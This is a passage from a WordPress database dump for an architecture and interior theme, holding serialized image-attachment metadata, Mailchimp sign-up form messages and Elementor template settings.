:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18392;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:42:\"minh-pham-OtXADkUh3-I-unsplash-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15268;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(260,3060,'_wp_attached_file','2022/06/bg-testimonial-and-contact-home2.jpg'),(261,3060,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:556;s:4:\"file\";s:44:\"2022/06/bg-testimonial-and-contact-home2.jpg\";s:8:\"filesize\";i:107200;s:5:\"sizes\";a:12:{s:6:\"medium\";a:5:{s:4:\"file\";s:43:\"bg-testimonial-and-contact-home2-300x87.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:87;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5077;}s:5:\"large\";a:5:{s:4:\"file\";s:45:\"bg-testimonial-and-contact-home2-1024x297.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:297;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37560;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:44:\"bg-testimonial-and-contact-home2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4064;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:44:\"bg-testimonial-and-contact-home2-768x222.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:222;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22906;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:45:\"bg-testimonial-and-contact-home2-1536x445.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:445;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74869;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:44:\"bg-testimonial-and-contact-home2-768x556.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:556;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49077;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:44:\"bg-testimonial-and-contact-home2-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23496;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:44:\"bg-testimonial-and-contact-home2-378x556.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:556;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28275;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:44:\"bg-testimonial-and-contact-home2-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51238;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:44:\"bg-testimonial-and-contact-home2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12819;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:44:\"bg-testimonial-and-contact-home2-600x174.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15141;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:44:\"bg-testimonial-and-contact-home2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2240;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(263,3123,'_wp_attached_file','2022/06/qaulife.jpg'),(264,3123,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:370;s:6:\"height\";i:399;s:4:\"file\";s:19:\"2022/06/qaulife.jpg\";s:8:\"filesize\";i:84345;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"qaulife-278x300.jpg\";s:5:\"width\";i:278;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15427;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"qaulife-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5764;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:19:\"qaulife-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16891;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:19:\"qaulife-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3169;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(266,3133,'_wp_attached_file','2022/06/morder.jpg'),(267,3133,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:370;s:6:\"height\";i:399;s:4:\"file\";s:18:\"2022/06/morder.jpg\";s:8:\"filesize\";i:129317;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"morder-278x300.jpg\";s:5:\"width\";i:278;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21787;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"morder-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7712;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:18:\"morder-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23615;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:18:\"morder-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4126;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(269,3134,'_wp_attached_file','2022/06/Innovative.jpg'),(270,3134,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:370;s:6:\"height\";i:399;s:4:\"file\";s:22:\"2022/06/Innovative.jpg\";s:8:\"filesize\";i:111604;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"Innovative-278x300.jpg\";s:5:\"width\";i:278;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20773;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"Innovative-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7666;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:22:\"Innovative-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22410;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:22:\"Innovative-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4027;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(272,3226,'_wp_attached_file','2022/06/part-counter-get-know-us.png'),(273,3226,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:149;s:6:\"height\";i:44;s:4:\"file\";s:36:\"2022/06/part-counter-get-know-us.png\";s:8:\"filesize\";i:14529;s:5:\"sizes\";a:1:{s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:35:\"part-counter-get-know-us-100x44.png\";s:5:\"width\";i:100;s:6:\"height\";i:44;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7752;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(275,3250,'_wp_attached_file','2022/06/image-home3.jpg'),(276,3250,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:531;s:4:\"file\";s:23:\"2022/06/image-home3.jpg\";s:8:\"filesize\";i:169030;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"image-home3-282x300.jpg\";s:5:\"width\";i:282;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19864;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"image-home3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7289;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:23:\"image-home3-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33837;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:23:\"image-home3-378x531.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:531;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36095;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:23:\"image-home3-500x473.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46550;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:23:\"image-home3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21119;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:23:\"image-home3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4041;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(278,3383,'_wp_attached_file','2022/06/woocommerce-placeholder.png'),(279,3383,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:1200;s:4:\"file\";s:35:\"2022/06/woocommerce-placeholder.png\";s:8:\"filesize\";i:102644;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:35:\"woocommerce-placeholder-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10546;}s:5:\"large\";a:5:{s:4:\"file\";s:37:\"woocommerce-placeholder-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:84297;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:35:\"woocommerce-placeholder-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3767;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:35:\"woocommerce-placeholder-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:49572;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:35:\"woocommerce-placeholder-768x660.png\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:48731;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:35:\"woocommerce-placeholder-390x473.png\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:21123;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:35:\"woocommerce-placeholder-378x824.png\";s:5:\"width\";i:378;s:6:\"height\";i:824;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:51314;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:35:\"woocommerce-placeholder-960x473.png\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:70270;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:35:\"woocommerce-placeholder-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10546;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:35:\"woocommerce-placeholder-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:31893;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:35:\"woocommerce-placeholder-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1803;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(280,3539,'_wp_attached_file','2022/06/image-bg-a.jpg'),(281,3539,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:569;s:4:\"file\";s:22:\"2022/06/image-bg-a.jpg\";s:8:\"filesize\";i:121696;s:5:\"sizes\";a:12:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"image-bg-a-300x89.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:89;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8852;}s:5:\"large\";a:5:{s:4:\"file\";s:23:\"image-bg-a-1024x303.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:303;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81319;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"image-bg-a-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7965;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"image-bg-a-768x228.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:228;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48543;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:23:\"image-bg-a-1536x455.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:455;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:163013;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:22:\"image-bg-a-768x569.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:569;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97083;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:22:\"image-bg-a-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56800;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:22:\"image-bg-a-378x569.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:569;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:70789;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:22:\"image-bg-a-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:123365;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:22:\"image-bg-a-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29265;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:22:\"image-bg-a-600x178.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:178;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31111;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:22:\"image-bg-a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3919;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(283,3570,'_wp_attached_file','2022/06/bg-couter.png'),(284,3570,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1036;s:6:\"height\";i:1936;s:4:\"file\";s:21:\"2022/06/bg-couter.png\";s:8:\"filesize\";i:132684;s:5:\"sizes\";a:12:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"bg-couter-161x300.png\";s:5:\"width\";i:161;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:11286;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"bg-couter-548x1024.png\";s:5:\"width\";i:548;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:81960;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"bg-couter-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7845;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"bg-couter-768x1435.png\";s:5:\"width\";i:768;s:6:\"height\";i:1435;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:141326;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:22:\"bg-couter-822x1536.png\";s:5:\"width\";i:822;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:158236;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:21:\"bg-couter-768x660.png\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:95604;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:21:\"bg-couter-390x473.png\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:42624;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:21:\"bg-couter-378x824.png\";s:5:\"width\";i:378;s:6:\"height\";i:824;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:49576;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:21:\"bg-couter-960x473.png\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:81073;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:21:\"bg-couter-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:24748;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:22:\"bg-couter-600x1121.png\";s:5:\"width\";i:600;s:6:\"height\";i:1121;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:94249;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:21:\"bg-couter-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3895;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(286,3589,'_wp_attached_file','2022/06/bg-section-1.png'),(287,3589,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:387;s:6:\"height\";i:799;s:4:\"file\";s:24:\"2022/06/bg-section-1.png\";s:8:\"filesize\";i:63641;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"bg-section-1-145x300.png\";s:5:\"width\";i:145;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:14419;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"bg-section-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:11324;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:24:\"bg-section-1-387x660.png\";s:5:\"width\";i:387;s:6:\"height\";i:660;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:65224;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:24:\"bg-section-1-387x473.png\";s:5:\"width\";i:387;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:57948;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:24:\"bg-section-1-378x799.png\";s:5:\"width\";i:378;s:6:\"height\";i:799;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:66116;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:24:\"bg-section-1-387x473.png\";s:5:\"width\";i:387;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:57948;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:24:\"bg-section-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:36166;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:24:\"bg-section-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5657;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(289,7,'_elementor_edit_mode','builder'),(290,7,'_elementor_template_type','kit'),(291,7,'_wp_page_template','default'),(292,7,'_elementor_page_settings','a:1:{s:16:\"site_description\";s:27:\"Architecture &amp; Interior\";}'),(315,107,'_mc4wp_settings','a:9:{s:15:\"required_fields\";s:5:\"EMAIL\";s:12:\"double_optin\";s:1:\"1\";s:15:\"update_existing\";s:1:\"0\";s:17:\"replace_interests\";s:1:\"1\";s:15:\"subscriber_tags\";s:0:\"\";s:18:\"hide_after_success\";s:1:\"0\";s:8:\"redirect\";s:0:\"\";s:3:\"css\";s:1:\"0\";s:5:\"lists\";a:0:{}}'),(316,107,'text_subscribed','Thank you, your sign-up request was successful! Please check your email inbox to confirm.'),(317,107,'text_invalid_email','Please provide a valid email address.'),(318,107,'text_required_field_missing','Please fill in the required fields.'),(319,107,'text_already_subscribed','Given email address is already subscribed, thank you!'),(320,107,'text_error','Oops. Something went wrong. Please try again later.'),(321,107,'text_unsubscribed','You were successfully unsubscribed.'),(322,107,'text_not_subscribed','Given email address is not subscribed.'),(323,107,'text_no_lists_selected','Please select at least one list.'),(324,107,'text_updated','Thank you, your records have been updated!'),(325,107,'_wp_old_date','2022-06-07'),(326,107,'_wp_old_date','2022-06-23'),(327,1173,'_elementor_edit_mode','builder'),(328,1173,'_elementor_template_type','section'),(329,1173,'_elementor_version','3.6.6'),(330,1173,'_wp_page_template','default'),(331,1173,'_elementor_data','[{\"id\":\"508d958\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"22\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"746afdc\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d8d793f\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ovasev_elementor_service_list\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"012cadb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"344d221\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"content_position\":\"center\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovathe